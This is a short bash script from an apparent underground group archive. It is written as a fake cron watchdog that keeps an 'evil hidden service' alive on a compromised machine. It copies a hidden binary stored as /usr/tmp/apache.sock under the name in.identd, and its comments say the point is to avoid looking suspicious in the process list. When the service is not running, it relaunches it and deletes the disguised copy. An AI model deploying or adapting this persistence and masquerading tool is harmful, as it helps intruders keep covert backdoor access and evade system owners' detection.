#!/bin/bash
# This Shell script comes with absolutely no warranty!
# Use at your own risk.
# Under GPL ver. 2.0 and above. Read the license at http://www.gnu.org
# Written by hip0.
# Don't blame me if you find that on your box. 
# I didn't putted it there:] I just wrote it.
# Put this as fake cron for our evil hidden service 
# Do not modify! This checks for open sockets for new identd  childs.
# Greeting to everyone that get freaky all the time.
# Special tnx to: all the pC-fREAK memberz.
# http://rootshell.be/~pcfreak/Archive/ -- Say no to M$.
## 08,23,43,56 *     * * * /usr/tmp/.in.identd.pid

# How many services with the same name are running?
r_before_cnt='7';

a_cnt=$(( $r_before_cnt + 1 ));
# Fake file of the service. You know we should not look suspicios:].
# e.g. tshd:}]
prog_f='/usr/tmp/apache.sock';

# Filename. How should it look like from "ps ( process list )".
prog_s='in.identd';

# The program we're masking our evil service as.  
prog="$prog_s";

# Filename. with params to show as "ps ( process list )".
apptorun="$prog -P/dev/null";

# Home path where our fake $prog_f is.
HOME_PATH=/usr/tmp;

chk_prog_f_ex () {
if [ ! -x $prog_f ]; then
echo "$prog_f does not exist! Dying ...";
exit 1;
fi
}

chk_state () {
state=$(ps ax | grep "$prog" | grep -v grep | wc -l | awk '{ print $1 }');
}

chk_if_running () {  
if [ "$state" == "$a_cnt" ]; then
exit 0
else
cp $HOME_PATH/$prog_f $HOME_PATH/$prog_s;
(export PATH=$HOME_PATH:$PATH;$apptorun 2>&1 > /dev/null);
rm -f $HOME_PATH/$prog_s;
exit 0
fi
}

main () {
chk_prog_f_ex;
chk_state;
chk_if_running;
}
main;

# The End. Enjoy!